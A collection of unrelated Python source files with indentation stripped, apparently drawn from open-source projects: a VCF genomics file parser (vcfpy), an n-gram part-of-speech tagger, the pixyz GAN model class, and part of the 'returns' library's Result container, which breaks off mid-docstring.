"""Parse into appropriate HeaderLine"""
def parse_key_value(self, key, value):
"""Parse the key/value pair
:param str key: the key to use in parsing
:param str value: the value to parse
:returns: :py:class:`vcfpy.header.HeaderLine` object
"""
raise NotImplementedError("Must be overridden")
class StupidHeaderLineParser(HeaderLineParserBase):
"""Parse into HeaderLine (no particular structure)"""
def parse_key_value(self, key, value):
return header.HeaderLine(key, value)
class MappingHeaderLineParser(HeaderLineParserBase):
"""Parse into HeaderLine (no particular structure)"""
def __init__(self, line_class):
"""Initialize the parser"""
#: the class to use for the VCF header line
self.line_class = line_class
def parse_key_value(self, key, value):
return self.line_class(key, value, parse_mapping(value))
def build_header_parsers():
"""Return mapping for parsers to use for each VCF header type
Inject the WarningHelper into the parsers.
"""
result = {
"ALT": MappingHeaderLineParser(header.AltAlleleHeaderLine),
"contig": MappingHeaderLineParser(header.ContigHeaderLine),
"FILTER": MappingHeaderLineParser(header.FilterHeaderLine),
"FORMAT": MappingHeaderLineParser(header.FormatHeaderLine),
"INFO": MappingHeaderLineParser(header.InfoHeaderLine),
"META": MappingHeaderLineParser(header.MetaHeaderLine),
"PEDIGREE": MappingHeaderLineParser(header.PedigreeHeaderLine),
"SAMPLE": MappingHeaderLineParser(header.SampleHeaderLine),
"__default__": StupidHeaderLineParser(), # fallback
}
return result
# Field value converters
_CONVERTERS = {
"Integer": int,
"Float": float,
"Flag": lambda x: True,
"Character": str,
"String": str,
}
def convert_field_value(type_, value):
"""Convert atomic field value according to the type"""
if value == ".":
return None
elif type_ in ("Character", "String"):
if "%" in value:
for k, v in record.UNESCAPE_MAPPING:
value = value.replace(k, v)
return value
else:
try:
return _CONVERTERS[type_](value)
except ValueError:
warnings.warn(
("{} cannot be converted to {}, keeping as " "string.").format(value, type_),
CannotConvertValue,
)
return value
def parse_field_value(field_info, value):
"""Parse ``value`` according to ``field_info``
"""
if field_info.id == "FT":
return [x for x in value.split(";") if x != "."]
elif field_info.type == "Flag":
return True
elif field_info.number == 1:
return convert_field_value(field_info.type, value)
else:
if value == ".":
return []
else:
return [convert_field_value(field_info.type, x) for x in value.split(",")]
# Regular expression for break-end
BREAKEND_PATTERN = re.compile("[\\[\\]]")
def parse_breakend(alt_str):
"""Parse breakend and return tuple with results, parameters for BreakEnd
constructor
"""
arr = BREAKEND_PATTERN.split(alt_str)
mate_chrom, mate_pos = arr[1].split(":", 1)
mate_pos = int(mate_pos)
if mate_chrom[0] == "<":
mate_chrom = mate_chrom[1:-1]
within_main_assembly = False
else:
within_main_assembly = True
FWD_REV = {True: record.FORWARD, False: record.REVERSE}
orientation = FWD_REV[alt_str[0] == "[" or alt_str[0] == "]"]
mate_orientation = FWD_REV["[" in alt_str]
if orientation == record.FORWARD:
sequence = arr[2]
else:
sequence = arr[0]
return (mate_chrom, mate_pos, orientation, mate_orientation, sequence, within_main_assembly)
def process_sub_grow(ref, alt_str):
"""Process substution where the string grows"""
if len(alt_str) == 0:
raise exceptions.InvalidRecordException("Invalid VCF, empty ALT")
elif len(alt_str) == 1:
if ref[0] == alt_str[0]:
return record.Substitution(record.DEL, alt_str)
else:
return record.Substitution(record.INDEL, alt_str)
else:
return record.Substitution(record.INDEL, alt_str)
def process_sub_shrink(ref, alt_str):
"""Process substution where the string shrink"""
if len(ref) == 0:
raise exceptions.InvalidRecordException("Invalid VCF, empty REF")
elif len(ref) == 1:
if ref[0] == alt_str[0]:
return record.Substitution(record.INS, alt_str)
else:
return record.Substitution(record.INDEL, alt_str)
else:
return record.Substitution(record.INDEL, alt_str)
def process_sub(ref, alt_str):
"""Process substitution"""
if len(ref) == len(alt_str):
if len(ref) == 1:
return record.Substitution(record.SNV, alt_str)
else:
return record.Substitution(record.MNV, alt_str)
elif len(ref) > len(alt_str):
return process_sub_grow(ref, alt_str)
else: # len(ref) < len(alt_str):
return process_sub_shrink(ref, alt_str)
def process_alt(header, ref, alt_str): # pylint: disable=W0613
"""Process alternative value using Header in ``header``"""
# By its nature, this function contains a large number of case distinctions
if "]" in alt_str or "[" in alt_str:
return record.BreakEnd(*parse_breakend(alt_str))
elif alt_str[0] == "." and len(alt_str) > 0:
return record.SingleBreakEnd(record.FORWARD, alt_str[1:])
elif alt_str[-1] == "." and len(alt_str) > 0:
return record.SingleBreakEnd(record.REVERSE, alt_str[:-1])
elif alt_str[0] == "<" and alt_str[-1] == ">":
inner = alt_str[1:-1]
return record.SymbolicAllele(inner)
else: # substitution
return process_sub(ref, alt_str)
class HeaderParser:
"""Helper class for parsing a VCF header
"""
def __init__(self):
#: Sub parsers to use for parsing the header lines
self.sub_parsers = build_header_parsers()
def parse_line(self, line):
"""Parse VCF header ``line`` (trailing '\r\n' or '\n' is ignored)
:param str line: ``str`` with line to parse
:param dict sub_parsers: ``dict`` mapping header line types to
appropriate parser objects
:returns: appropriate :py:class:`HeaderLine` parsed from ``line``
:raises: :py:class:`vcfpy.exceptions.InvalidHeaderException` if
there was a problem parsing the file
"""
if not line or not line.startswith("##"):
raise exceptions.InvalidHeaderException(
'Invalid VCF header line (must start with "##") {}'.format(line)
)
if "=" not in line:
raise exceptions.InvalidHeaderException(
'Invalid VCF header line (must contain "=") {}'.format(line)
)
line = line[len("##") :].rstrip() # trim '^##' and trailing whitespace
# split key/value pair at "="
key, value = split_mapping(line)
sub_parser = self.sub_parsers.get(key, self.sub_parsers["__default__"])
return sub_parser.parse_key_value(key, value)
class RecordParser:
"""Helper class for parsing VCF records"""
def __init__(self, header, samples, record_checks=None):
#: Header with the meta information
self.header = header
#: SamplesInfos with sample information
self.samples = samples
#: The checks to perform, can contain 'INFO' and 'FORMAT'
self.record_checks = tuple(record_checks or [])
# Expected number of fields
if self.samples.names:
self.expected_fields = 9 + len(self.samples.names)
else:
self.expected_fields = 8
# Cache of FieldInfo objects by FORMAT string
self._format_cache = {}
# Cache of FILTER entries, also applied to FORMAT/FT
self._filter_ids = set(self.header.filter_ids())
# Helper for checking INFO fields
if "INFO" in self.record_checks:
self._info_checker = InfoChecker(self.header)
else:
self._info_checker = NoopInfoChecker()
# Helper for checking FORMAT fields
if "FORMAT" in self.record_checks:
self._format_checker = FormatChecker(self.header)
else:
self._format_checker = NoopFormatChecker()
def parse_line(self, line_str):
"""Parse line from file (including trailing line break) and return
resulting Record
"""
line_str = line_str.rstrip()
if not line_str:
return None # empty line, EOF
arr = self._split_line(line_str)
# CHROM
chrom = arr[0]
# POS
pos = int(arr[1])
# IDS
if arr[2] == ".":
ids = []
else:
ids = arr[2].split(";")
# REF
ref = arr[3]
# ALT
alts = []
if arr[4] != ".":
for alt in arr[4].split(","):
alts.append(process_alt(self.header, ref, alt))
# QUAL
if arr[5] == ".":
qual = None
else:
try:
qual = int(arr[5])
except ValueError: # try as float
qual = float(arr[5])
# FILTER
if arr[6] == ".":
filt = []
else:
filt = arr[6].split(";")
self._check_filters(filt, "FILTER")
# INFO
info = self._parse_info(arr[7], len(alts))
if len(arr) == 9:
raise exceptions.IncorrectVCFFormat("Expected 8 or 10+ columns, got 9!")
elif len(arr) == 8:
format_ = None
calls = None
else:
# FORMAT
format_ = arr[8].split(":")
# sample/call columns
calls = self._handle_calls(alts, format_, arr[8], arr)
return record.Record(chrom, pos, ids, ref, alts, qual, filt, info, format_, calls)
def _handle_calls(self, alts, format_, format_str, arr):
"""Handle FORMAT and calls columns, factored out of parse_line"""
if format_str not in self._format_cache:
self._format_cache[format_str] = list(map(self.header.get_format_field_info, format_))
# per-sample calls
calls = []
for sample, raw_data in zip(self.samples.names, arr[9:]):
if self.samples.is_parsed(sample):
data = self._parse_calls_data(format_, self._format_cache[format_str], raw_data)
call = record.Call(sample, data)
self._format_checker.run(call, len(alts))
self._check_filters(call.data.get("FT"), "FORMAT/FT", call.sample)
calls.append(call)
else:
calls.append(record.UnparsedCall(sample, raw_data))
return calls
def _check_filters(self, filt, source, sample=None):
if not filt:
return
for f in filt:
self._check_filter(f, source, sample)
def _check_filter(self, f, source, sample):
if f == "PASS":
pass # the PASS filter is implicitely defined
elif f not in self._filter_ids:
if source == "FILTER":
warnings.warn(
("Filter not found in header: {}; problem in FILTER " "column").format(f),
UnknownFilter,
)
else:
assert source == "FORMAT/FT" and sample
warnings.warn(
(
"Filter not found in header: {}; problem in "
"FORMAT/FT column of sample {}"
).format(f, sample),
UnknownFilter,
)
def _split_line(self, line_str):
"""Split line and check number of columns"""
arr = line_str.rstrip().split("\t")
if len(arr) != self.expected_fields:
raise exceptions.InvalidRecordException(
(
"The line contains an invalid number of fields. Was "
"{} but expected {}\n{}".format(len(arr), 9 + len(self.samples.names), line_str)
)
)
return arr
def _parse_info(self, info_str, num_alts):
"""Parse INFO column from string"""
result = OrderedDict()
if info_str == ".":
return result
# The standard is very nice to parsers, we can simply split at
# semicolon characters, although I (Manuel) don't know how strict
# programs follow this
for entry in info_str.split(";"):
if "=" not in entry: # flag
key = entry
result[key] = parse_field_value(self.header.get_info_field_info(key), True)
else:
key, value = split_mapping(entry)
result[key] = parse_field_value(self.header.get_info_field_info(key), value)
self._info_checker.run(key, result[key], num_alts)
return result
@classmethod
def _parse_calls_data(klass, format_, infos, gt_str):
"""Parse genotype call information from arrays using format array
:param list format: List of strings with format names
:param gt_str arr: string with genotype information values
"""
data = OrderedDict()
# The standard is very nice to parsers, we can simply split at
# colon characters, although I (Manuel) don't know how strict
# programs follow this
for key, info, value in zip(format_, infos, gt_str.split(":")):
data[key] = parse_field_value(info, value)
return data
class HeaderChecker:
"""Helper class for checking a VCF header
"""
def run(self, header):
"""Check the header
Warnings will be printed using ``warnings`` while errors will raise
an exception.
:raises: ``vcfpy.exceptions.InvalidHeaderException`` in the case of
severe errors reading the header
"""
self._check_header_lines(header.lines)
def _check_header_lines(self, header_lines):
"""Check header lines, in particular for starting file "##fileformat"
"""
if not header_lines:
raise exceptions.InvalidHeaderException(
"The VCF file did not contain any header lines!"
)
first = header_lines[0]
if first.key != "fileformat":
raise exceptions.InvalidHeaderException("The VCF file did not start with ##fileformat")
if first.value not in SUPPORTED_VCF_VERSIONS:
warnings.warn("Unknown VCF version {}".format(first.value), UnknownVCFVersion)
@functools.lru_cache(maxsize=32)
def binomial(n, k):
try:
res = math.factorial(n) // math.factorial(k) // math.factorial(n - k)
except ValueError:
res = 0
return res
class NoopInfoChecker:
"""Helper class that performs no checks"""
def __init__(self):
pass
def run(self, key, value, num_alts):
pass
class InfoChecker:
"""Helper class for checking an INFO field"""
def __init__(self, header):
#: VCFHeader to use for checking
self.header = header
def run(self, key, value, num_alts):
"""Check value in INFO[key] of record
Currently, only checks for consistent counts are implemented
:param str key: key of INFO entry to check
:param value: value to check
:param int alts: list of alternative alleles, for length
"""
field_info = self.header.get_info_field_info(key)
if not isinstance(value, list):
return
TABLE = {
".": len(value),
"A": num_alts,
"R": num_alts + 1,
"G": binomial(num_alts + 1, 2), # diploid only at the moment
}
expected = TABLE.get(field_info.number, field_info.number)
if len(value) != expected:
tpl = "Number of elements for INFO field {} is {} instead of {}"
warnings.warn(
tpl.format(key, len(value), field_info.number), exceptions.IncorrectListLength
)
class NoopFormatChecker:
"""Helper class that performs no checks"""
def __init__(self):
pass
def run(self, call, num_alts):
pass
class FormatChecker:
"""Helper class for checking a FORMAT field"""
def __init__(self, header):
#: VCFHeader to use for checking
self.header = header
def run(self, call, num_alts):
"""Check ``FORMAT`` of a record.Call
Currently, only checks for consistent counts are implemented
"""
for key, value in call.data.items():
self._check_count(call, key, value, num_alts)
def _check_count(self, call, key, value, num_alts):
field_info = self.header.get_format_field_info(key)
if isinstance(value, list):
return
num_alleles = len(call.gt_alleles or [])
TABLE = {
".": len(value),
"A": num_alts,
"R": num_alts + 1,
"G": binomial(num_alts + num_alleles, num_alleles),
}
expected = TABLE.get(field_info.number, field_info.number)
if len(value) != expected:
tpl = (
"Number of elements for FORMAT field {} is {} instead "
"of {} (number specifier {})"
)
warnings.warn(
tpl.format(key, len(value), expected, field_info.number),
exceptions.IncorrectListLength,
)
class Parser:
"""Class for line-wise parsing of VCF files
In most cases, you want to use :py:class:`vcfpy.reader.Reader` instead.
:param stream: ``file``-like object to read from
:param str path: path the VCF is parsed from, for display purposes
only, optional
"""
def __init__(self, stream, path=None, record_checks=None):
self.stream = stream
self.path = path
#: checks to perform, can contain 'INFO' and 'FORMAT'
self.record_checks = tuple(record_checks or [])
#: header, once it has been read
self.header = None
# the currently read line
self._line = stream.readline() # trailing '\n'
#: :py:class:`vcfpy.header.SamplesInfos` with sample information;
#: set on parsing the header
self.samples = None
# helper for parsing the records
self._record_parser = None
# helper for checking the header
self._header_checker = HeaderChecker()
def _read_next_line(self):
"""Read next line store in self._line and return old one"""
prev_line = self._line
self._line = self.stream.readline()
return prev_line
def parse_header(self, parsed_samples=None):
"""Read and parse :py:class:`vcfpy.header.Header` from file, set
into ``self.header`` and return it
:param list parsed_samples: ``list`` of ``str`` for subsetting the
samples to parse
:returns: ``vcfpy.header.Header``
:raises: ``vcfpy.exceptions.InvalidHeaderException`` in the case of
problems reading the header
"""
# parse header lines
sub_parser = HeaderParser()
header_lines = []
while self._line and self._line.startswith("##"):
header_lines.append(sub_parser.parse_line(self._line))
self._read_next_line()
# parse sample info line
self.samples = self._handle_sample_line(parsed_samples)
# construct Header object
self.header = header.Header(header_lines, self.samples)
# check header for consistency
self._header_checker.run(self.header)
# construct record parser
self._record_parser = RecordParser(self.header, self.samples, self.record_checks)
# read next line, must not be header
self._read_next_line()
if self._line and self._line.startswith("#"):
raise exceptions.IncorrectVCFFormat(
'Expecting non-header line or EOF after "#CHROM" line'
)
return self.header
def _handle_sample_line(self, parsed_samples=None):
""""Check and interpret the "##CHROM" line and return samples"""
if not self._line or not self._line.startswith("#CHROM"):
raise exceptions.IncorrectVCFFormat('Missing line starting with "#CHROM"')
# check for space before INFO
line = self._line.rstrip()
pos = line.find("FORMAT") if ("FORMAT" in line) else line.find("INFO")
if pos == -1:
raise exceptions.IncorrectVCFFormat('Ill-formatted line starting with "#CHROM"')
if " " in line[:pos]:
warnings.warn(
(
"Found space in #CHROM line, splitting at whitespace "
"instead of tab; this VCF file is ill-formatted"
),
SpaceInChromLine,
)
arr = self._line.rstrip().split()
else:
arr = self._line.rstrip().split("\t")
self._check_samples_line(arr)
return header.SamplesInfos(arr[len(REQUIRE_SAMPLE_HEADER) :], parsed_samples)
@classmethod
def _check_samples_line(klass, arr):
"""Peform additional check on samples line"""
if len(arr) <= len(REQUIRE_NO_SAMPLE_HEADER):
if tuple(arr) != REQUIRE_NO_SAMPLE_HEADER:
raise exceptions.IncorrectVCFFormat(
"Sample header line indicates no sample but does not "
"equal required prefix {}".format("\t".join(REQUIRE_NO_SAMPLE_HEADER))
)
elif tuple(arr[: len(REQUIRE_SAMPLE_HEADER)]) != REQUIRE_SAMPLE_HEADER:
raise exceptions.IncorrectVCFFormat(
'Sample header line (starting with "#CHROM") does not '
"start with required prefix {}".format("\t".join(REQUIRE_SAMPLE_HEADER))
)
def parse_line(self, line):
"""Pare the given line without reading another one from the stream"""
return self._record_parser.parse_line(line)
def parse_next_record(self):
"""Read, parse and return next :py:class:`vcfpy.record.Record`
:returns: next VCF record or ``None`` if at end
:raises: ``vcfpy.exceptions.InvalidRecordException`` in the case of
problems reading the record
"""
return self.parse_line(self._read_next_line())
def print_warn_summary(self):
"""If there were any warnings, print summary with warnings"""
# TODO: remove?
|
#!/usr/bin/python
# -*- coding: utf-8 -*
import re
import pandas as pd
import os
from data_preparation import *
from collections import Counter
import numpy as np
import pickle
from metrics import accuracy, build_confusion_matrices
def n_gram_train(filepath, grammage, folder, register_change, start_end_symbols, weighed, tf_idf_coefficient, length, double):
tf_idf_coefficient = float(tf_idf_coefficient)
dataset = pd.DataFrame(columns=['WORD', 'TAG'])
raw_data = open(filepath, encoding='utf8').readlines()
counter = 0
for instance in raw_data:
if (instance[0] != "#" and instance.strip()):
cols = instance.split('\t')
if (int(register_change) == 0):
dataset.loc[counter] = [cols[1], cols[3]]
else:
dataset.loc[counter] = [cols[1].lower(), cols[3]]
counter = counter + 1
names = dataset['TAG'].unique().tolist()
final_dictionary = {}
start_end_symbols = int(start_end_symbols)
if (length == 1):
by_length_dictionary = {}
if (weighed == 1):
corpus_length = dataset.shape[0]
ngram_in_word_dictionary = {}
words_with_ngram_dictionary = {}
for name in names:
clone = dataset[dataset['TAG'] == name]
n_grams = []
if (length == 1):
words_lengths = []
for word in clone['WORD']:
if (start_end_symbols == 1):
word = "#" + word + "#"
if (length == 1):
words_lengths.append(len(word))
if (weighed == 1):
ngrams_of_word_dictionary = {}
for gram in test_split(word, "", 0, int(grammage), double):
n_grams.extend(gram)
if (weighed == 1):
if gram[0] in words_with_ngram_dictionary.keys():
words_with_ngram_dictionary[gram[0]].append(word)
else:
words_with_ngram_dictionary[gram[0]] = []
words_with_ngram_dictionary[gram[0]].append(word)
if gram[0] in ngrams_of_word_dictionary.keys():
ngrams_of_word_dictionary[gram[0]] += 1
else:
ngrams_of_word_dictionary[gram[0]] = 1
if (weighed == 1):
for gram in ngrams_of_word_dictionary.keys():
if gram in ngram_in_word_dictionary.keys():
if (ngrams_of_word_dictionary[gram] > ngram_in_word_dictionary[gram]):
ngram_in_word_dictionary[gram] = ngrams_of_word_dictionary[gram]
else:
ngram_in_word_dictionary[gram] = ngrams_of_word_dictionary[gram]
if (length == 1):
by_length_dictionary[name] = round(np.mean(words_lengths))
cnt = Counter(n_grams)
grams = []
if (weighed == 0):
for gram in cnt.most_common(2):
grams.append(gram[0])
else:
weighed_grams = {}
for gram in cnt.most_common():
weighed_grams[gram[0]] = tf_idf_n_gram(tf_idf_coefficient, gram[1], ngram_in_word_dictionary[gram[0]], corpus_length, len(words_with_ngram_dictionary[gram[0]]))
weighed_grams = dict(reversed(sorted(weighed_grams.items(), key=lambda item: item[1])))
for key in list(weighed_grams.keys())[0:2]:
grams.append(key)
final_dictionary[name] = grams
with open(folder + "\\" + grammage + 'grams.pkl', 'wb+') as f:
pickle.dump(final_dictionary, f, pickle.HIGHEST_PROTOCOL)
if (length == 1):
with open(folder + "\\length_" + grammage + 'grams.pkl', 'wb+') as f:
pickle.dump(by_length_dictionary, f, pickle.HIGHEST_PROTOCOL)
def n_gram_test(data, folder, grammage, register_change, start_end_symbols, length):
test_dataset = pd.DataFrame(columns=['WORD', 'TAG'])
raw_data = open(data, encoding='utf8').readlines()
counter = 0
start_end_symbols = int(start_end_symbols)
for instance in raw_data:
if (instance[0] != "#" and instance.strip()):
cols = instance.split('\t')
if (int(register_change) == 0):
test_dataset.loc[counter] = [cols[1], cols[3]]
else:
if (start_end_symbols == 0):
test_dataset.loc[counter] = [cols[1].lower(), cols[3]]
else:
test_dataset.loc[counter] = ["#" + cols[1].lower() + "#", cols[3]]
counter = counter + 1
with open(folder + "\\" + grammage + "grams.pkl", 'rb') as f:
final_dictionary = pickle.load(f)
if (length == 1):
with open(folder + "\\length_" + grammage + 'grams.pkl', 'rb') as f:
by_length_dictionary = pickle.load(f)
correct = 0
total = 0
correct_by_part = []
total_by_part = []
true_pred_dataset = pd.DataFrame(columns=['tok', 'true', 'pred'])
for index, row in test_dataset.iterrows():
key_found = False
for key in final_dictionary.keys():
if re.search(final_dictionary[key][0], row['WORD']):
if key == row['TAG']:
correct = correct + 1
correct_by_part.append(key)
key_found = True
true_pred_dataset.loc[index] = [row['WORD'], row['TAG'], key]
break
elif re.search(final_dictionary[key][1], row['WORD']):
if key == row['TAG']:
correct = correct + 1
correct_by_part.append(key)
key_found = True
true_pred_dataset.loc[index] = [row['WORD'], row['TAG'], key]
break
elif length == 1:
if len(row['WORD']) == by_length_dictionary['CCONJ']:
if row['TAG'] == 'CCONJ':
correct = correct + 1
correct_by_part.append(key)
key_found = True
true_pred_dataset.loc[index] = [row['WORD'], row['TAG'], key]
break
elif len(row['WORD']) == by_length_dictionary['ADP']:
if row['TAG'] == 'ADP':
correct = correct + 1
correct_by_part.append(key)
key_found = True
true_pred_dataset.loc[index] = [row['WORD'], row['TAG'], key]
break
elif len(row['WORD']) == by_length_dictionary['VERB']:
if row['TAG'] == 'VERB':
correct = correct + 1
correct_by_part.append(key)
key_found = True
true_pred_dataset.loc[index] = [row['WORD'], row['TAG'], key]
break
if not key_found:
if row['TAG'] == 'VERB':
correct = correct + 1
correct_by_part.append(key)
true_pred_dataset.loc[index] = [row['WORD'], row['TAG'], 'VERB']
total = total + 1
total_by_part.append(key)
true_pred_dataset.to_csv(folder + "\\" + 'res.csv', index=False)
accuracy(correct_by_part, total_by_part, correct, total)
build_confusion_matrices(true_pred_dataset)
|
<reponame>masa-su/pixyz<filename>pixyz/models/gan.py<gh_stars>100-1000
from torch import optim
from ..models.model import Model
from ..losses import AdversarialJensenShannon
from ..distributions import EmpiricalDistribution
class GAN(Model):
r"""
Generative Adversarial Network
(Adversarial) Jensen-Shannon divergence between given distributions (p_data, p)
is set as the loss class of this model.
Examples
--------
>>> import torch
>>> from torch import nn, optim
>>> from pixyz.distributions import Deterministic
>>> from pixyz.distributions import Normal
>>> from pixyz.models import GAN
>>> from pixyz.utils import print_latex
>>> x_dim = 128
>>> z_dim = 100
...
>>> # Set distributions (Distribution API)
...
>>> # generator model p(x|z)
>>> class Generator(Deterministic):
... def __init__(self):
... super(Generator, self).__init__(var=["x"], cond_var=["z"], name="p")
... self.model = nn.Sequential(
... nn.Linear(z_dim, x_dim),
... nn.Sigmoid()
... )
... def forward(self, z):
... x = self.model(z)
... return {"x": x}
...
>>> # prior model p(z)
>>> prior = Normal(loc=torch.tensor(0.), scale=torch.tensor(1.),
... var=["z"], features_shape=[z_dim], name="p_{prior}")
...
>>> # generative model
>>> p_g = Generator()
>>> p = (p_g*prior).marginalize_var("z")
...
>>> # discriminator model p(t|x)
>>> class Discriminator(Deterministic):
... def __init__(self):
... super(Discriminator, self).__init__(var=["t"], cond_var=["x"], name="d")
... self.model = nn.Sequential(
... nn.Linear(x_dim, 1),
... nn.Sigmoid()
... )
... def forward(self, x):
... t = self.model(x)
... return {"t": t}
...
>>> d = Discriminator()
>>> # Set a model (Model API)
>>> model = GAN(p, d, optimizer_params={"lr":0.0002}, d_optimizer_params={"lr":0.0002})
>>> print(model)
Distributions (for training):
p(x)
Loss function:
mean(D_{JS}^{Adv} \left[p_{data}(x)||p(x) \right])
Optimizer:
Adam (
Parameter Group 0
amsgrad: False
betas: (0.9, 0.999)
eps: 1e-08
lr: 0.0002
weight_decay: 0
)
>>> # Train and test the model
>>> data = torch.randn(1, x_dim) # Pseudo data
>>> train_loss = model.train({"x": data})
>>> test_loss = model.test({"x": data})
"""
def __init__(self, p, discriminator,
optimizer=optim.Adam,
optimizer_params={},
d_optimizer=optim.Adam,
d_optimizer_params={},
clip_grad_norm=None,
clip_grad_value=None):
"""
Parameters
----------
p : torch.distributions.Distribution
Generative model (generator).
discriminator : torch.distributions.Distribution
Critic (discriminator).
optimizer : torch.optim
Optimization algorithm.
optimizer_params : dict
Parameters of optimizer
clip_grad_norm : float or int
Maximum allowed norm of the gradients.
clip_grad_value : float or int
Maximum allowed value of the gradients.
"""
# set distributions (for training)
distributions = [p]
p_data = EmpiricalDistribution(p.var)
# set losses
loss = AdversarialJensenShannon(p_data, p, discriminator, optimizer=d_optimizer,
optimizer_params=d_optimizer_params)
super().__init__(loss, test_loss=loss,
distributions=distributions,
optimizer=optimizer, optimizer_params=optimizer_params,
clip_grad_norm=clip_grad_norm, clip_grad_value=clip_grad_value)
def train(self, train_x_dict={}, adversarial_loss=True, **kwargs):
"""Train the model.
Parameters
----------
train_x_dict : dict, defaults to {}
Input data.
adversarial_loss : bool, defaults to True
Whether to train the discriminator.
**kwargs
Returns
-------
loss : torch.Tensor
Train loss value.
d_loss : torch.Tensor
Train loss value of the discriminator (if :attr:`adversarial_loss` is True).
"""
if adversarial_loss:
d_loss = self.loss_cls.loss_train(train_x_dict, **kwargs)
loss = super().train(train_x_dict, **kwargs)
if adversarial_loss:
return loss, d_loss
return loss
def test(self, test_x_dict={}, adversarial_loss=True, **kwargs):
"""Train the model.
Parameters
----------
test_x_dict : dict, defaults to {}
Input data.
adversarial_loss : bool, defaults to True
Whether to return the discriminator loss.
**kwargs
Returns
-------
loss : torch.Tensor
Test loss value.
d_loss : torch.Tensor
Test loss value of the discriminator (if :attr:`adversarial_loss` is True).
"""
loss = super().test(test_x_dict, **kwargs)
if adversarial_loss:
d_loss = self.loss_cls.loss_test(test_x_dict, **kwargs)
return loss, d_loss
return loss
|
# -*- coding: utf-8 -*-
from abc import ABCMeta
from functools import wraps
from inspect import iscoroutinefunction
from typing import (
Any,
Callable,
ClassVar,
Coroutine,
Generic,
NoReturn,
Type,
TypeVar,
Union,
overload,
)
from typing_extensions import final
from returns.primitives.container import BaseContainer
from returns.primitives.exceptions import UnwrapFailedError
# Definitions:
_ValueType = TypeVar('_ValueType', covariant=True)
_NewValueType = TypeVar('_NewValueType')
_ErrorType = TypeVar('_ErrorType', covariant=True)
_NewErrorType = TypeVar('_NewErrorType')
# Aliases:
_DefaultValueType = TypeVar('_DefaultValueType')
_FirstType = TypeVar('_FirstType')
_SecondType = TypeVar('_SecondType')
class Result(
BaseContainer,
Generic[_ValueType, _ErrorType],
metaclass=ABCMeta,
):
"""
Base class for :class:`~_Failure` and :class:`~_Success`.
:class:`~Result` does not have
"""
_inner_value: Union[_ValueType, _ErrorType]
success_type: ClassVar[Type['_Success']]
failure_type: ClassVar[Type['_Failure']]
def map( # noqa: A003
self,
function: Callable[[_ValueType], _NewValueType],
) -> 'Result[_NewValueType, _ErrorType]':
"""Abstract method to compose container with a pure function."""
raise NotImplementedError
def bind(
self,
function: Callable[[_ValueType], 'Result[_NewValueType, _ErrorType]'],
) -> 'Result[_NewValueType, _ErrorType]':
"""Abstract method to compose a container with another container."""
raise NotImplementedError
def fix(
self,
function: Callable[[_ErrorType], _NewValueType],
) -> 'Result[_NewValueType, _ErrorType]':
"""
Abstract method to compose failed container and a pure function.
This pure function should return a new state
for a successful container.
"""
raise NotImplementedError
def alt(
self,
function: Callable[[_ErrorType], _NewErrorType],
) -> 'Result[_ValueType, _NewErrorType]':
"""
Abstract method to compose failed container and a pure function.
This pure function should return a new state
for a new failed container.
"""
raise NotImplementedError
def rescue(
self,
function: Callable[
[_ErrorType], 'Result[_ValueType, _NewErrorType]',
],
) -> 'Result[_ValueType, _NewErrorType]':
"""
Abstract method to compose a failed container with another container.
This method is the oposite of ``.bind()``.
"""
raise NotImplementedError
def value_or(
self,
default_value: _DefaultValueType,
) -> Union[_ValueType, _DefaultValueType]:
"""Get value or default value."""
raise NotImplementedError
def unwrap(self) -> _ValueType:
"""Get value or raise exception."""
raise NotImplementedError
def failure(self) -> _ErrorType:
"""Get failed value or raise exception."""
raise NotImplementedError
@final
class _Failure(Result[Any, _ErrorType]):
"""
Represents a calculation which has failed.
It should contain an error code or message.
Should not be used directly.
"""
_inner_value: _ErrorType
def __init__(self, inner_value: _ErrorType) -> None:
"""Required for typing."""
super().__init__(inner_value)
def map(self, function): # noqa: A003
"""
Returns the '_Failure' instance that was used to call the method.
.. code:: python
>>> def mappable(string: str) -> str:
... return string + 'b'
...
>>> Failure('a').map(mappable) == Failure('a')
True
"""
return self
def bind(self, function):
"""
Returns the '_Failure' instance that was used to call the method.
.. code:: python
>>> def bindable(string: str) -> Result[str, str]:
... return Success(string + 'b')
...
>>> Failure('a').bind(bindable) == Failure('a')
True
"""
return self
def fix(self, function):
"""
Applies function to the inner value.
Applies 'function' to the contents of the '_Success' instance
and returns a new '_Success' object containing the result.
'function' should accept a single "normal" (non-container) argument
and return a non-container result.
.. code:: python
>>> def fixable(arg: str) -> str:
... return 'ab'
...
>>> Failure('a').fix(fixable) == Success('ab')
True
"""
return _Success(function(self._inner_value))
def rescue(self, function):
"""
Applies 'function' to the result of a previous calculation.
'function' should accept a single "normal" (non-container) argument
and return Result a '_Failure' or '_Success' type object.
.. code:: python
>>> def rescuable(arg: str) -> Result[str, str]:
... return Success(arg + 'b')
...
>>> Failure('a').rescue(rescuable) == Success('ab')
True
"""
return function(self._inner_value)
def alt(self, function):
"""
Applies function to the error value.
Applies 'function' to the contents of the '_Failure' instance
and returns a new '_Failure' object containing the result.
'function' should accept a single "normal" (non-container) argument
and return a non-container result.
.. code:: python
>>> def altable(arg: str) -> Result[str, str]:
... return arg + 'b'
...
>>> Failure('a').alt(altable) == Failure('ab')
True
"""
return _Failure(function(self._inner_value))
def value_or(self, default_value):
"""
Returns the value if we deal with '_Success' or default otherwise.
.. code:: python
>>> Failure(1).value_or(2)
2
"""
return default_value
def unwrap(self):
"""
Raises an exception, since it does not have a value inside.
.. code:: python
>>> Failure(1).unwrap()
Traceback (most recent call last):
...
returns.primitives.exceptions.UnwrapFailedError
"""
if isinstance(self._inner_value, Exception):
raise UnwrapFailedError(self) from self._inner_value
raise UnwrapFailedError(self)
def failure(self):
"""
Unwraps inner error value from failed container.
.. code:: python
>>> Failure(1).failure()
1
"""
return self._inner_value
@final
class _Success(Result[_ValueType, Any]):
"""
Represents a calculation which has succeeded and contains the result.
Contains the computation value.
Should not be used directly.
"""
_inner_value: _ValueType
def __init__(self, inner_value: _ValueType) -> None:
"""Required for typing."""
super().__init__(inner_value)
def map(self, function): # noqa: A003
"""
Applies function to the inner value.
Applies 'function' to the contents of the '_Success' instance
and returns a new '_Success' object containing the result.
'function' should accept a single "normal" (non-container) argument
and return a non-container result.
.. code:: python
>>> def mappable(string: str) -> str:
... return string + 'b'
...
>>> Success('a').map(mappable) == Success('ab')
True
"""
return _Success(function(self._inner_value))
def bind(self, function):
"""
Applies 'function' to the result of a previous calculation.
'function' should accept a single "normal" (non-container) argument
and return Result a '_Failure' or '_Success' type object.
.. code:: python
>>> def bindable(string: str) -> Result[str, str]:
